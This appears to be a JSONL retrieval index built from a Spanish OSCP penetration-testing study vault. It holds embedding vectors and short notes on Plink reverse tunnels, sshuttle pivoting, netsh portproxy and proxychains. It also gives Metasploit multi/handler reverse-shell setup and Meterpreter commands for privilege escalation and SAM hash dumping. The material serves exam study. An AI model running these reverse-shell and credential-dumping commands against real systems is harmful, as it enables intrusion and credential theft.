0.02772, 0.05, -0.06094, 0.07914, 0.03862, -0.02983, -0.01797, 0.16008, 0.10621, 0.03399, -0.02666, -0.0363, 0.00017, 0.09381, 0.00214, -0.09032, 0.12376, -0.01976, 0.04368, -0.04739, -0.04904, -0.09282, 0.25316, 0.02164, 0.05514, -0.03663, -0.0018, 0.08627, -0.04938, 0.05754, 0.0343, 0.01262, -0.13587, -0.05863, -0.08438, 0.00045, 0.0477, -0.0545, 0.05829, 0.10799, 0.05718, -0.0391, 0.01971, 0.09498, 0.03465, -0.12136, -0.07144, 0.10017, -0.01273, 0.02138, -0.07112, -0.0765, 0.11139, -0.06466, 0.05284, -0.04975, -0.05334, 0.13321, -0.02436, 0.00614, -0.01892, 0.073, 0.04423, -0.02282, 0.00447, -0.01288, -0.15518, -0.04966, -0.05751, 0.08173, -0.02576, -0.01843, -0.05499, 0.01413, -0.01046, 0.01631, 0.03446, 0.04225, -0.11341, -0.02315, 0.0856, -0.01363, 0.07526, -0.00349, 0.07948, -0.05171, -0.0044, 0.01024, -0.05517, -0.01817, 0.02374, -0.0407, -0.01792, 0.03002, 0.02644, 0.00647, -0.04107, -0.02743, -0.04944, -0.0596, 0.05938, 0.07876, -0.04235, -0.03407, 0.07527, -0.006, 0.0572, 0.05748, -0.15941, -0.0254, 0.09433, 0.00017, -0.01318, 0.05455, -0.02639, -0.06498, -0.04539, -0.03215, 0.0313, -0.05506, -0.02406, -0.02705, -0.052, 0.09448, 0.05093, -0.06709, -0.08149, 0.07876, 0.03006, 0.10064, -0.00631, 0.03177, 0.06392, 0.05192, 0.02854, -0.04397, -0.02416, 0.0734, -0.013, 0.01231, -0.0845, -0.05451, -0.03654, 0.08911, 0.0234, 0.03079, -0.02944, -0.03724, 0.02739, -0.01699, 0.01938, 0.08894, -0.07599, 0.04692, 0.02764, -0.06369, -0.01384, -0.04139, -0.10851, -0.01184, -0.09855, -0.04916, -0.04432, 0.04705, -0.08061, -0.02607, -0.0479, 0.08905, -0.00483, 0.00892, -0.02774, -0.01121, -0.00162, -0.06253, -0.00603, 0.01277, -0.02411, -0.00704, 0.07466, -0.00551, -0.04764, -0.03113, 0.03115, -0.02298, -0.02073, -0.00726, -0.07704, -0.0497, 0.01063, -0.00076, 0.02607, 0.0068, -0.00041, 0.04808, -0.04416, 0.00357, 0.02741, -0.09896, -0.01954, 0.0723, 0.00087, 0.03505, -0.03818, -0.02701, -0.01235, 0.01797, 0.14477, 0.04246, -0.0132, -0.0502, -0.00438, 0.02821, 0.02086, -0.01892, 0.01041, 0.03663, -0.05119, -0.06749, -0.02858, 0.01022, 0.06933, -0.06823, -0.04204, -0.00325, -0.00916, -0.02064, -0.01285, 0.0433, -0.01177, -0.03125, -0.00628, -0.02159, -0.02871, -0.01833, -0.08686, 0.01975, -0.07209, 0.00958, 0.03243]} +{"tipo": "metodologia", "herramienta": "Tunneling", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "texto": "## Plink (SSH desde Windows)\n```cmd\nplink.exe -R 3390:127.0.0.1:3389 user@TU_IP\n```", "v": [-0.06498, -0.13195, -0.0897, -0.06989, 0.12331, -0.24623, -0.0901, -0.10038, 0.059, 0.11841, 0.08067, -0.06162, 0.03394, -0.14966, -0.14185, -0.11427, -0.1918, 0.00096, 0.04516, 0.02981, 0.01388, 0.10622, -0.09403, 0.01429, 0.09513, 0.20255, -0.13094, 0.05326, -0.04297, -0.12197, 0.03537, -0.02646, -0.10248, -0.03376, -0.0351, -0.03914, 0.02918, 0.10146, 0.05147, 0.1716, -0.00079, 0.06286, -0.07468, 0.07298, 0.04294, -0.01412, 0.14955, -0.02033, 0.09211, -0.0609, -0.13948, -0.05973, -0.05131, -0.00528, 0.06175, 0.01502, 0.1632, -0.06333, -0.03469, -0.01142, 0.02912, 0.12825, -0.02286, 0.01626, 0.03282, -0.00746, 0.10509, -0.06372, -0.05673, 0.08343, -0.05522, -0.02034, -0.04838, -0.04464, 0.10601, -0.08042, 0.02796, 0.02953, 0.10455, -0.01522, -0.05862, -0.01235, -0.02663, -0.12354, -0.0148, -0.02922, 0.08564, -0.06612, -0.03286, -0.03119, 0.1446, 0.00778, -0.01167, 0.06671, 0.0505, -0.09793, 0.02972, 0.08714, 0.06728, 0.01449, -0.00571, 0.03906, -0.09738, 0.08989, 0.06585, 0.04373, -0.00063, 0.00219, 0.00219, 0.04997, 0.02526, -0.00016, 0.04968, -0.00953, -0.0454, -0.03774, -0.0713, -0.00024, 0.02568, -0.03409, -0.03911, -0.00166, -0.01805, 0.06263, -0.06175, -0.0995, 0.0233, 0.06919, -0.00159, -0.02849, 0.02172, -0.00417, 0.01203, -0.07099, -0.00485, 0.01468, 0.05614, -0.0203, 0.03363, 0.0136, 0.13965, 0.01045, 0.01824, 0.06627, 0.03576, -0.00669, 0.02961, -0.05499, -0.06278, 0.02928, 0.14024, 0.02017, -0.05154, 0.02358, 0.0076, 0.06503, 0.02232, 0.00899, 0.02798, -0.02238, 0.00446, 0.03412, 0.07405, 0.01581, 0.00562, -0.00051, -0.03492, -0.01505, -0.00349, -0.04328, -0.00876, 0.00426, -0.09314, -0.06514, -0.027, -0.08046, 0.0261, -0.09661, -0.06176, 0.01508, -0.07586, -0.03692, 0.01006, 0.00887, -0.03696, -0.00519, 0.0169, 0.01459, -0.02995, -0.01932, -0.00357, 0.00697, -0.02416, -0.03533, 0.08099, -0.02793, -0.00043, -0.1208, 0.01591, -0.03248, -0.07745, 0.02482, -0.00876, -0.03528, 0.03947, -0.04364, -0.0377, -0.01031, 0.02532, -0.02957, 0.0101, -0.04888, 0.04169, 0.03751, -0.00304, -0.02753, 0.03126, 0.03733, -0.01063, -0.04571, -0.03472, 0.03569, 0.01504, -0.00167, -0.00775, -0.03146, 0.01601, -0.04537, -0.00289, -0.01464, -0.01232, 0.05615, 0.06576, -0.05127, 0.00633, -0.04858, 0.06137, -0.02845, -0.03494, -0.06288, -0.0475, 0.05903, -0.0296, -0.06281, -0.03027, -0.04962, -0.03216, -0.00399, 0.02199, -0.07475, -0.01854, -0.0143, -0.01517, -0.02646, -0.00807, 0.00126]} +{"tipo": "metodologia", "herramienta": "Tunneling", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "texto": "## sshuttle (VPN improvisada, lo más cómodo)\n```bash\nsshuttle -r user@pivot 192.168.5.0/24 --dns\n```", "v": [0.00374, -0.0972, -0.21747, -0.0207, 0.04029, -0.05003, -0.01906, -0.14169, 0.04897, 0.007, 0.13529, -0.12256, 0.03267, -0.04333, -0.22581, -0.00358, -0.05981, -0.03255, 0.12425, 0.16628, -0.10027, -0.01136, -0.1446, 0.00185, -0.04799, 0.09217, 0.04115, 0.16636, -0.10606, 0.0341, -0.02533, -0.06843, -0.13584, 0.02502, -0.04276, -0.07043, -0.02735, 0.15385, -0.01881, 0.14418, -0.01257, 0.05463, -0.06076, 0.05187, 0.13978, -0.0692, 0.00359, -0.00318, 0.01465, -0.05516, -0.11158, 0.02116, -0.0007, 0.04048, 0.07939, 0.03067, 0.15812, -0.08684, 0.00304, -0.06477, -0.03113, -0.09735, 0.00641, -0.03153, 0.04384, 0.00394, -0.00431, -0.16062, -0.12349, 0.03893, -0.03342, 0.07771, -0.06984, 0.04285, 0.07247, 7e-05, 0.0026, -0.0008, 0.07368, 0.12719, -0.08495, -0.09208, 0.00053, -0.04122, -0.01548, -0.0428, 0.08, -0.08479, -0.04468, -0.02069, 0.0147, 0.00817, 0.02708, 0.0145, 0.058, -0.02613, 0.01548, 0.10897, 0.02656, -0.10543, 0.07898, 0.07825, -0.06658, 0.0062, 0.03778, 0.00661, 0.03763, -0.00822, -0.00763, 0.0088, 0.15845, 0.05259, 0.03462, 0.01549, -0.02824, 0.0327, -0.10589, 0.04157, 0.06877, -0.00031, 0.01496, -0.08321, -0.01097, -0.00037, -0.04373, -0.03785, -0.03954, 0.04375, 0.06874, -0.03414, 0.06076, -0.02057, -0.04381, -0.01125, -0.0065, 0.01309, -0.00011, -0.06921, -0.03251, -0.08316, 0.06659, 0.0377, -0.00812, 0.04681, 0.07633, 0.0338, 0.00833, -0.09759, -0.04084, 0.0994, 0.00383, 0.08438, -0.03791, -0.02634, 0.00321, 0.06547, -0.0579, -0.08491, -0.02225, 0.05116, 0.044, 0.00649, 0.11726, 0.09183, 0.00082, 0.04005, -0.0184, -0.09023, 0.04686, 0.0065, 0.02501, 0.04046, -0.03362, -0.01866, -0.10026, -0.05599, 0.04091, -0.03939, 2e-05, -0.01342, 0.03747, 0.0004, -0.03969, -0.00405, 0.0372, -0.0137, 0.06727, -0.07723, 0.06845, -0.01077, -0.04498, -0.0104, -0.05692, -0.04032, -0.05589, 0.05873, -0.00792, -0.07025, 0.00262, 0.03245, -0.03863, 0.01461, -0.01289, -0.05586, -0.05868, 0.00039, -0.07466, -0.02297, 0.01462, -0.04583, 0.0328, -0.05875, 0.01475, 0.03138, -0.06428, -0.02362, 0.01423, -0.03885, 0.02229, -0.06914, -0.07378, 0.07818, 0.00671, -0.00283, 0.01956, 0.01923, 0.01576, 0.05872, -0.03933, -0.0136, -0.08101, 0.02244, -0.02142, -0.07577, 0.0375, -0.01228, 0.03608, 0.05695, 0.01045, -0.06132, 0.0148, 0.00739, -0.03483, -0.01458, -0.02354, -0.02499, -0.06639, 0.02581, 0.01422, -0.01894, -0.0078, -0.00604, 0.05133, -0.09356, 0.01709, 0.00864]} +{"tipo": "metodologia", "herramienta": "Tunneling", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "texto": "## Windows nativo — netsh portproxy\n```cmd\nnetsh interface portproxy add v4tov4 listenport=8080 connectaddress=192.168.5.10 connectport=80\n```", "v": [0.0293, -0.09879, -0.2049, -0.16649, 0.0086, -0.11368, 0.07241, -0.05477, 0.00181, -0.02677, 0.00841, -0.0981, -0.01451, -0.05702, -0.09842, -0.0792, 0.01379, -0.00486, 0.03535, 0.01274, -0.04053, 0.02096, -0.09303, -0.06501, 0.13541, 0.16056, 0.01903, 0.04783, -0.02615, -0.0184, -0.00988, -0.09701, 0.00448, 0.11333, -0.0673, -0.11652, -0.0518, 0.11115, 0.04314, 0.12183, 0.04187, 0.0764, -0.06309, 0.04168, 0.23335, -0.11123, 0.04377, -0.06529, 0.02862, -0.07552, -0.09338, -0.02307, -0.0483, 0.07396, 0.00059, -0.02744, 0.12743, -0.05957, -0.03137, -0.00704, -0.00396, 0.04968, -0.09829, -0.0425, 0.03289, -0.11717, -0.0125, 0.00036, -0.1349, 0.11761, -0.02756, 0.0187, -0.00329, -0.00145, 0.0857, 0.02657, 0.06119, -0.01112, 0.08208, 0.06162, 0.00665, -0.03695, -0.00769, -0.1987, -0.10215, -0.08491, -0.03592, -0.01272, -0.0294, -0.08846, 0.07768, -0.1069, -0.04487, -0.02113, -0.00371, -0.11017, 0.02089, 0.03856, 0.01358, -0.064, 0.06948, 0.12276, -0.01146, 0.04677, 0.007, -0.02092, -0.06987, -0.07503, -0.01162, 0.10265, 0.09437, 0.043, 0.10546, -0.01586, -0.01268, -0.07006, -0.01108, -0.036, 0.06611, 0.03587, -0.05553, -0.0562, -0.03946, 0.01877, -0.04847, -0.06711, 0.00024, 0.11163, -0.00046, -0.00497, 0.07697, -0.01792, 0.00512, -0.12779, -0.03223, -0.02365, 0.00459, -0.05046, 0.01083, -0.03119, 0.08637, 0.02069, 0.00123, -0.06764, 0.07691, 0.10058, 0.02652, 0.06133, -0.02854, 0.01946, 0.05048, 0.06992, -0.06276, -0.01113, -0.05643, 0.05717, 0.06115, -0.00769, -0.05392, -0.07679, 0.07145, 0.03215, 0.03783, -0.05524, -0.00082, -0.00782, -0.09472, -0.0059, 0.05806, -0.01877, -0.01163, 0.098, -0.06692, -0.10568, -0.04447, -0.02715, -0.04404, -0.06453, -0.04298, 0.00599, -0.00215, -0.01734, -0.03955, -0.11351, 0.0223, -0.05106, -0.01251, -0.07216, -0.02885, 0.0671, -0.04093, 0.04859, -0.00472, 0.05223, 0.00366, 0.09417, 0.00506, 0.01023, -0.03092, 0.03558, 0.00245, 0.03292, 0.0248, -0.06437, 0.00829, 0.10144, -0.04645, -0.04487, 0.00383, 0.09967, -0.02557, -0.07397, 0.01818, 0.0432, -0.0692, -0.02282, 0.0712, -0.03204, 0.0166, -0.00651, -0.03059, 0.01684, 0.02805, 0.04006, 0.03651, -0.01812, -0.02096, 0.04501, 0.05844, -0.03352, -0.0181, -0.01155, -0.01775, -0.06556, -0.05488, -0.06193, -0.03665, 0.0093, -0.05231, -0.04018, 0.02093, 0.02016, -0.01658, -0.03345, -0.00575, -0.04807, -0.00555, 0.04497, 0.02923, -0.00311, -0.02687, -0.02395, 0.10919, -0.03432, -0.00316, 0.04956]} +{"tipo": "metodologia", "herramienta": "Tunneling", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "texto": "## proxychains\n- `proxychains nmap -sT -Pn IP` → usa `-sT` (TCP connect): el SYN scan **no** pasa por el proxy. Ver Nmap NSE.\n\nRelacionado: Pivoting ligolo-ng · Movimiento lateral · Puesto de mando Kali · OSCP MOC", "v": [-0.15895, -0.11548, -0.16221, -0.01506, 0.04585, -0.2311, 0.00837, -0.05401, -0.12376, 0.12067, 0.08696, 0.02153, 0.11786, -0.13743, -0.13518, 0.11533, -0.06191, 0.00562, 0.08391, 0.01325, -0.12521, 0.0427, -0.10577, -0.07328, 0.15609, 0.23178, -0.01163, -0.0278, -0.11231, -0.08648, -0.15016, -0.05886, 0.03393, 0.04553, -0.02886, -0.0749, 0.06657, 0.03911, 0.08385, 0.17313, -0.05091, -0.02461, -0.08185, 0.07607, 0.10746, -0.10267, 0.03157, -0.03173, 0.05505, 0.01593, -0.11264, -0.10238, -0.159, 0.07942, -0.02627, 0.01763, 0.0075, -0.07143, -0.01252, -0.00484, -0.01393, -0.01621, -0.03833, -0.20434, -0.03684, -0.03012, -0.03109, -0.03685, -0.17778, -0.00505, -0.0141, 0.07654, 0.01926, 0.02544, 0.01101, -0.05417, 0.03205, -0.09038, 0.15965, 0.10267, 0.00905, -0.02145, -0.05893, -0.06723, -0.10667, -0.03517, 0.04251, -0.01393, 0.07507, -0.00382, 0.12545, 0.07042, -0.0273, 0.02724, 0.11632, -0.03681, -0.05457, -0.03514, 0.03141, -0.04418, 0.09047, 0.09105, -0.06952, 0.01233, -0.0199, 0.01111, 0.05017, 0.068, 0.08883, 0.09372, 0.10906, -0.01004, -0.00331, -0.07902, 0.01571, -0.00349, -0.03834, 0.04786, -0.00488, -0.05558, 0.02652, 0.0062, 0.04767, 0.02891, -0.05488, 0.00686, -0.02412, 0.07142, -0.00541, 0.06728, -0.02518, -0.08007, -0.07304, -0.05768, -0.03412, 0.01078, 0.09948, -0.07577, 0.0011, 0.00044, 0.0008, -0.03826, -0.00353, 0.02472, 0.05423, 0.03714, -0.00024, 0.02086, -0.01662, 0.04453, -0.00929, 0.02132, -0.06543, -0.00808, 0.00503, -0.02517, -0.02049, -0.07588, 0.00719, 0.01144, 0.00928, 0.01794, 0.03094, 0.03457, 0.01201, 0.01561, 0.00054, -0.03864, 0.00053, -0.07145, -0.02433, -0.00209, -0.04101, -0.07165, -0.03443, -0.07956, 0.01239, -0.02885, -0.01158, -0.01805, -0.00378, -0.04358, -0.00513, -0.02441, -0.00951, 0.03697, 0.03085, 0.01887, 0.01922, 0.05766, -0.01328, 0.00097, 0.00247, 0.02182, 0.04051, -0.03098, 0.01321, -0.1133, -0.03042, -0.03136, 0.00019, -0.02653, -0.01028, 0.00559, -0.01888, -0.03905, 0.01151, 0.01689, -0.00334, 0.00071, 0.04678, -0.03921, 0.03207, 0.02628, -0.02046, -0.00072, -0.01339, 0.019, -0.02257, -0.03338, -0.06264, 0.02985, 0.01406, 0.03453, -0.00124, -0.03347, -0.02015, 0.00519, 0.01127, -0.00909, -0.00142, 0.02857, 0.01221, -0.05539, 0.01696, -0.00129, -0.02607, -0.00841, 0.0109, -0.00449, -0.00395, -0.02082, -0.00701, -0.02028, -0.04881, -0.04351, 0.01262, 0.01971, 0.00641, -0.02347, 0.01223, -0.03527, -0.04265, -0.08499, 0.00506, 0.05088]} +{"tipo": "metodologia", "herramienta": "Metasploit", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "texto": "# Metasploit\n\n> ⚠️ **En el examen: solo en UNA máquina, y solo el foothold inicial cuenta como \"uso\"** (la post-explotación con meterpreter no cuenta). Ver Reglas de herramientas. Fuente: oscp.trastero.org/metasploit.", "v": [0.02529, -0.09611, -0.18149, -0.21475, 0.02972, -0.06393, -0.09756, -0.06833, -0.10025, -0.11252, -0.21199, -0.02223, 0.0491, 0.01446, 0.10459, 0.04103, 0.03648, -0.11233, 0.00426, -0.1051, -0.17161, -0.05914, -0.09393, -0.09401, -0.03808, 0.13719, -0.07036, 0.01619, -0.10108, 0.05903, -0.00025, 0.03873, -0.10497, -0.10095, 0.03518, -0.09336, -0.00886, -0.0114, 0.16563, 0.0864, -0.03612, 0.07717, -0.00544, 0.13788, 0.18632, -0.14038, 0.05916, 0.07797, -0.12418, -0.0158, -0.00552, -0.09285, -0.07408, 0.08684, -0.12591, -0.07306, 0.13616, 0.08954, -0.06483, 0.00645, 0.08299, 0.01323, -0.04151, 0.00418, -0.01546, -0.02405, -0.00502, 0.02024, -0.12529, 0.03839, -0.04844, 0.00049, -0.07821, -0.04686, 0.01096, -0.06663, 0.01365, -0.05319, 0.08877, -0.03401, -0.11813, -0.08203, -0.09625, 0.00102, -0.06046, -0.06848, 0.04511, -0.02327, 0.07362, -0.08195, 0.02546, 0.05545, -0.06348, -0.08379, 0.02441, -0.09595, -0.0043, 0.08332, -0.03204, 0.0014, 0.10081, 0.01991, 0.04372, -0.03147, -0.01924, 0.08978, 0.00644, -0.07238, -0.04944, -0.0677, 0.04128, 0.02008, 0.01754, -0.00788, -0.02828, 0.0537, -0.08493, 0.01633, -0.04182, -0.02641, 0.01393, -0.06631, 0.03924, -0.00523, 0.02013, -0.05094, -0.01897, 0.02684, 0.07182, -0.06043, 0.02421, 0.01475, -0.07036, 0.01175, 0.02925, -0.09271, 0.03992, -0.07404, -0.02937, -0.02789, -0.01336, 0.08732, -0.07468, -0.04617, 0.03763, 0.00769, -0.03786, -0.11733, -0.04238, -0.01149, 0.09453, -0.04747, 0.05038, 0.07238, -0.0344, -0.04051, -0.04427, 0.04429, -0.07057, 0.01219, 0.00618, -0.05337, -0.03473, 0.00428, -0.00107, 0.02881, 0.06716, -0.0197, -0.03394, 0.00883, -0.04482, 0.0015, 0.08241, 0.01141, 0.0426, -0.08379, 0.04228, -0.03952, 0.00379, -0.02801, -0.0092, 0.04597, 0.01668, 0.02035, 0.00639, -0.01194, 0.02554, -0.05243, 0.04397, 0.00282, 0.07348, 0.02491, -0.00925, 0.01761, 0.04884, 0.04023, -0.04305, 0.06102, -0.00242, -0.02509, -0.02671, -0.02278, -0.04228, 0.00227, 0.02816, -0.00297, -0.06608, 0.01485, -0.10443, 0.02114, 0.03235, -0.049, 0.06391, -0.03812, -0.10641, -0.04157, 0.03822, 0.04541, -0.02705, 0.01013, -0.03809, 0.0338, 0.04329, -0.00079, -0.03499, 0.00334, 0.03901, -0.03063, 0.01673, -0.00152, -0.03921, -0.00827, -0.00518, -0.07236, -0.01132, -0.04016, 0.06578, -0.01834, -0.04563, -0.05465, 0.00312, 0.02734, 0.00485, -0.02534, -0.02516, -0.02915, -0.01306, 0.01074, 0.00618, -0.07932, -0.03276, -0.04361, -0.00717, -0.0656, 0.00503, -0.00458]} +{"tipo": "metodologia", "herramienta": "Metasploit", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "texto": "## Básico\n```\nmsfconsole -q\nsearch \nuse exploit/...\nshow options ; set RHOSTS IP ; set LHOST TU_IP ; run\n```", "v": [-0.14594, -0.15935, -0.21057, -0.07468, 0.0772, -0.25633, -0.03437, -0.12268, -0.0674, 0.1013, -0.05525, -0.09139, 0.07497, 0.01036, 0.00336, 0.01717, -0.01942, 0.01037, -0.05502, -0.06969, 0.00762, 0.09431, -0.13098, 0.08512, -0.0191, 0.1333, -0.11771, 0.00622, -0.08088, -0.11736, 0.02168, -0.09878, -0.19337, 0.0132, -0.10468, -0.16753, 0.03198, 0.07603, 0.02943, 0.10526, 0.05025, -0.03382, -0.10398, 0.0969, 0.14067, -0.06268, 0.03207, -0.03296, -0.05118, -0.06789, -0.0483, -0.06266, 0.01181, -0.02553, 0.01167, -0.03271, 0.04796, -0.01574, -0.09553, 0.0082, 0.01505, 0.01451, -0.0512, -0.16779, 0.08721, -0.00136, 0.00806, 0.00425, -0.04764, -0.04642, -0.05644, -0.04743, -0.05438, 0.00768, 0.08635, 0.05906, 0.0311, -0.07605, 0.13131, 0.00894, -0.07142, -0.00772, -0.07697, 0.07577, -0.05123, -0.00251, 0.13394, -0.18156, 0.01561, -0.0589, 0.14146, -0.02543, -0.03072, -0.00418, 0.02627, -0.07376, 0.09105, -0.0038, 0.03941, 0.06552, 0.02409, 0.1051, -0.10757, 0.07072, 0.06299, 0.03909, 0.10007, -0.00789, 0.03143, -0.01369, -0.01401, -0.04108, -0.0294, -0.09432, -0.03833, 0.00337, -0.06473, -0.07507, 0.01097, -0.00705, -0.008, -0.03619, 0.03979, 0.00057, 0.0139, -0.04322, 0.00111, 0.06754, 0.01409, 0.00748, 0.02453, -0.01598, -0.04625, -0.0062, -0.00658, 0.00127, -0.02348, -0.03035, 0.0525, 0.02016, 0.12158, 0.05422, 0.01584, 0.0477, 0.13717, -0.0078, 0.06501, -0.09577, -0.00651, -0.02439, 0.04147, 0.03371, 0.00049, 0.03049, -0.04957, -0.02384, 0.00726, -0.05087, -0.0364, -0.00388, -0.01494, 0.0328, 0.04952, 0.05303, 0.04177, -0.00222, -0.01578, -0.01907, 0.02008, -0.03626, -0.01266, 0.05241, -0.02821, -0.04217, -0.02032, -0.00749, 0.04121, -0.05601, 0.03968, -0.016, 0.00568, -0.06275, -0.00906, 0.10548, 0.00696, -0.02842, 0.01558, -0.0179, 0.0325, -0.01763, 0.03492, 0.01343, -0.02607, 0.04391, 0.05043, -0.0141, -0.06337, -0.08295, 0.01207, -0.03021, -0.06702, 0.02209, -0.0425, 0.00369, 0.04373, -0.02679, -0.00457, 0.04506, -0.03471, 0.03951, 0.01943, -0.06588, 0.06416, -0.04662, -0.05407, 0.01348, 0.03495, 0.01483, 0.00027, -0.01489, -0.06917, 0.085, -0.02209, 0.05722, -0.01121, 0.01751, 0.03348, -0.05284, 0.03978, -0.00475, -0.07437, 0.02333, -0.02932, -0.03309, 0.02069, -0.03356, 0.03238, 0.00171, -0.02749, -0.06143, 0.00067, 0.06348, -0.03185, -0.05258, -0.03365, -0.0507, -0.07689, 0.02986, 0.0029, -0.00244, -0.04633, -0.01375, -0.04968, -0.05627, 0.03263, -0.01231]} +{"tipo": "metodologia", "herramienta": "Metasploit", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "texto": "## multi/handler (recibir un payload de msfvenom)\n```\nuse exploit/multi/handler\nset payload windows/shell_reverse_tcp # o windows/meterpreter/reverse_tcp\nset LHOST TU_IP ; set LPORT 443 ; run\n```", "v": [0.10451, -0.08407, -0.21591, -0.17588, 0.00345, -0.07363, -0.03445, -0.02955, 0.01153, 0.08658, -0.1433, -0.00987, 0.09283, 0.065, -0.06339, 0.04214, -0.10236, -0.1218, 0.07129, -0.11266, -0.05004, 0.08515, -0.08838, -0.0741, 0.02141, 0.19829, -0.00201, -0.00154, -0.17522, -0.07045, 0.00638, -0.07487, -0.05061, 0.01742, -0.02565, -0.04378, 0.01215, 0.12686, 0.03385, 0.19943, 0.08479, 0.07512, -0.15562, 0.07135, 0.23856, -0.06968, 0.03844, -0.05853, -0.0006, -0.18113, -0.06484, -0.04067, -0.10076, 0.00539, -0.01431, -0.00655, 0.11622, 0.0291, -0.01521, 0.00333, -0.03015, 0.10784, -0.13861, -0.10126, 0.0711, -0.05317, -0.006, -0.02091, -0.08097, -0.00847, -0.00541, 0.01702, -0.03189, 0.06184, 0.0966, 0.00669, -0.0049, 0.00087, 0.12356, 0.06526, -0.03123, -0.00632, -0.07203, -0.03625, -0.00763, -0.09772, 0.0921, -0.01313, 0.07957, -0.08326, 0.08192, -0.0054, -0.1079, 0.04539, 0.02217, -0.11205, -0.04593, -0.00799, -0.06834, 0.04672, 0.04091, 0.06552, -0.01007, 0.03854, 0.0834, 0.05641, 0.03054, -0.06818, -0.01029, -0.01127, 0.00907, 0.01738, 0.03115, -0.01253, -0.06386, -0.0937, -0.0757, 0.00404, 0.09025, 0.02125, -0.07963, -0.02428, 0.00117, 0.05085, 0.02614, -0.08227, 0.00648, 0.10973, -0.01689, 0.04678, -0.00582, 0.0515, -0.02163, -0.00843, -0.04757, 0.01792, 0.04891, -0.03097, -0.00293, 0.01732, 0.08051, 0.10346, 0.04834, 0.04314, 0.06617, 0.01607, 0.04841, -0.07044, -0.07821, 0.01768, 0.09447, 0.07558, -0.03184, -0.01612, -0.00321, -0.05573, 0.11348, -0.03983, -0.01217, 0.00462, -0.01528, 0.0691, -0.01277, 0.04917, 0.03128, -0.00538, -0.0628, 0.0106, 0.03212, -0.00831, -0.02544, 0.02274, 0.00904, -0.01673, 0.00356, -0.04863, -0.01485, -0.05901, 0.02583, -0.01462, -0.06394, -0.04212, 0.04019, 0.05923, -0.01618, -0.00544, -0.02119, 0.03608, 0.02148, -0.00608, 0.04774, 0.05953, -0.0326, -0.04847, 0.00626, -0.0197, -0.04415, -0.06138, 0.06577, 0.01458, -0.0184, 0.0103, 0.0492, -0.02138, 0.01526, -0.00651, -0.01922, 0.03087, 0.03329, -0.00026, 0.05519, -0.05762, 0.06332, 0.0104, -0.05016, -0.01043, 0.02897, 0.01579, 0.01374, 0.01771, -0.02809, 0.02011, -0.02686, 0.03374, -0.0029, -0.00415, 0.03154, -0.02358, 0.05812, -0.00912, -0.02429, 0.06243, -0.00416, -0.01076, 0.03915, -0.00841, -0.04398, -0.05439, -0.06375, -0.03117, -0.00653, 0.02536, -0.04545, -0.09175, -0.01991, -0.01928, -0.05456, 0.03382, -0.00036, 0.01194, -0.05215, 0.04569, -0.05638, -0.05047, -0.02493, -0.02133]} +{"tipo": "metodologia", "herramienta": "Metasploit", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "texto": "## Meterpreter (post-explotación)\n```\ngetuid # quién soy\ngetsystem # intento de privesc a SYSTEM\nhashdump # vuelca hashes SAM → Cracking de contraseñas / Pass-the-Hash\nps ; migrate 799 # migrar a otro proceso\nbackground ; sessions -i 1\n```", "v": [-0.00601, -0.20301, -0.16798, -0.25898, -0.02816, -0.18072, -0.1382, -0.04785, -0.05958, 0.0677, -0.11749, 0.1042, 0.00337, -0.06345, 0.11946, 0.07696, 0.02198, 0.05836, -0.0572, 0.0774, -0.01615, 0.08961, -0.03294, -0.03841, -0.02879, 0.06151, -0.05977, 0.02594, -0.21555, -0.07213, 0.03001, 0.03928, 0.02004, -0.00636, -0.02031, -0.0419, -0.08256, 0.07728, 0.04459, 0.15842, 0.01121, 0.07752, -0.05155, 0.05384, 0.05593, -0.24701, -9e-05, -0.0314, -0.01807, -0.1563, -0.09613, -0.0272, -0.18758, -0.06085, 0.02916, -0.06296, 0.04913, 0.05729, -0.10873, 0.05637, 0.01185, 0.05097, 0.04707, 0.04147, 0.00582, -0.06197, 0.07273, -0.02972, -0.00809, 0.22625, -0.00912, 0.05095, 0.03793, -0.02479, 0.12501, 0.05551, 0.08173, -0.09086, 0.06754, 0.07796, -0.09349, -0.05093, 0.05892, 0.00919, -0.09512, 0.01661, 0.061, -0.04078, 0.07992, -0.03226, 0.0784, 0.02799, 0.08393, -0.06046, 0.0423, 0.00702, -0.03831, -0.01265, -0.01096, -0.00535, -0.07769, 0.02482, -0.01755, 0.08069, -0.01829, 0.05355, 0.05395, 0.02318, 0.06246, -0.05429, 0.06877, 0.02115, 0.01152, -0.01459, -0.0429, -0.05276, -0.08282, 0.03793, -0.01216, -0.0081, -0.00944, -0.00825, 0.03213, -0.00691, 0.08594, -0.07662, -0.00332, 0.03956, -0.0164, -0.04402, 0.04113, 0.0168, -0.06962, 0.03463, 0.04865, -0.00954, 0.04718, -0.06475, -0.01914, -0.05489, 0.00698, 0.0586, 0.00608, 0.00884, 0.03736, 0.07088, 0.06032, -0.09061, -0.03106, -0.02861, 0.05137, -0.01347, 0.04864, 0.0167, -0.02118, 0.03632, -0.00948, -0.10526, -0.09327, 0.03339, 0.04002, 0.02489, -0.04947, -0.0013, -0.04667, 0.02306, 0.04949, -0.04272, 0.00096, -0.01155, -0.00323, -0.08478, -0.01115, -0.01528, 0.02173, -0.00573, 0.06288, -0.06119, 0.02607, -0.07869, -0.02774, -0.00749, 0.01642, -0.01964, -0.01151, 0.00444, 0.00632, -0.00636, 0.0299, -0.01192, 0.08547, 0.03191, -0.04514, 0.0229, 0.00926, 0.00735, -0.03461, -0.00165, -0.02105, -0.02606, 0.02634, 0.05258, 0.03391, 0.00575, 0.01965, 0.03837, -0.06076, -0.00509, -0.04918, 0.04848, 0.03026, 0.00548, 0.01494, -0.03697, -0.09978, 0.00127, -0.03683, 0.00228, -0.00918, -0.00837, -0.02653, 0.07443, 0.04085, 0.07987, -0.05125, 0.03404, 0.03193, 0.03643, -0.00283, 0.02288, 0.00847, 0.0115, -0.00359, 0.00654, 0.02661, -0.04489, -0.02259, 